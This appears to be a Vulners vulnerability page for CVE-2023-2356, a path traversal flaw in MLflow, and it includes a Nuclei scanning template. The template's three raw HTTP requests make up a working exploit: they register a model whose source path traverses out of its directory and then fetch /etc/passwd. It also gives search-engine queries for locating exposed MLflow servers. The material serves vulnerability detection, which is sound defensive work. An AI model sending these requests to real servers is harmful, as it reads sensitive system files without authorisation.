| Reporter | Title | Published | Views | Family All 19 |
|---|---|---|---|---|
| LFI in Model Version REST API creation | 20 Apr 202318:40 | – | huntr | |
| CVE-2023-2356 | 28 Apr 202307:26 | – | circl | |
| Mlflow 安全漏洞 | 27 Apr 202300:00 | – | cnnvd | |
| CVE-2023-2356 | 28 Apr 202300:00 | – | cve | |
| CVE-2023-2356 Relative Path Traversal in mlflow/mlflow | 28 Apr 202300:00 | – | cvelist | |
| Relative path traversal in mlflow | 28 Apr 202300:30 | – | github | |
| CVE-2023-2356 | 28 Apr 202300:15 | – | nvd | |
| BIT-MLFLOW-2023-2356 Relative Path Traversal in mlflow/mlflow | 6 Mar 202410:59 | – | osv | |
| CVE-2023-2356 Relative Path Traversal in mlflow/mlflow | 28 Apr 202300:00 | – | osv | |
| GHSA-X422-6QHV-P29G Relative path traversal in mlflow | 28 Apr 202300:30 | – | osv |
id: CVE-2023-2356
info:
name: Mlflow <2.3.0 - Local File Inclusion
author: Co5mos
severity: high
description: |
Relative Path Traversal in GitHub repository mlflow/mlflow prior to 2.3.1.
impact: |
Successful exploitation could allow an attacker to read sensitive files on the server.
remediation: |
Upgrade Mlflow to version 2.3.0 or above to mitigate the vulnerability.
reference:
- https://huntr.dev/bounties/7b5d130d-38eb-4133-8c7d-0dfc9a9d9896/
- https://nvd.nist.gov/vuln/detail/CVE-2023-2356
- https://github.com/mlflow/mlflow/commit/f73147496e05c09a8b83d95fb4f1bf86696c6342
- https://github.com/Ostorlab/KEV
- https://github.com/Ostorlab/known_exploited_vulnerbilities_detectors
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-2356
cwe-id: CWE-23
epss-score: 0.04153
epss-percentile: 0.89639
cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
vendor: lfprojects
product: mlflow
shodan-query: http.title:"mlflow"
fofa-query:
- app="MLflow"
- app="mlflow"
- title="mlflow"
google-query: intitle:"mlflow"
tags: cve2023,cve,lfi,huntr,mlflow,oss,intrusive,lfprojects,vuln
variables:
str: "{{rand_base(6)}}"
http:
- raw:
- |
POST /api/2.0/mlflow/registered-models/create HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"name": "{{str}}"}
- |
POST /api/2.0/mlflow/model-versions/create HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"name": "{{str}}", "source": "file://{{Hostname}}/../../../../../../../"}
- |
GET /model-versions/get-artifact?path=etc/passwd&name={{str}}&version={{version}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: regex
regex:
- root:[x*]:0:0
- type: status
status:
- 200
extractors:
- type: regex
name: version
group: 1
regex:
- '"version": "([0-9.]+)",'
internal: true
part: body
# digest: 490a00463044022030571080949d70719be0fa811330a4ad3a0fd654bd9254f92512d5a36d12f3f602200d0840208b80d7c6ff03771e263506b41833609ebeb76ac0e8c8ac17879ae34f:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation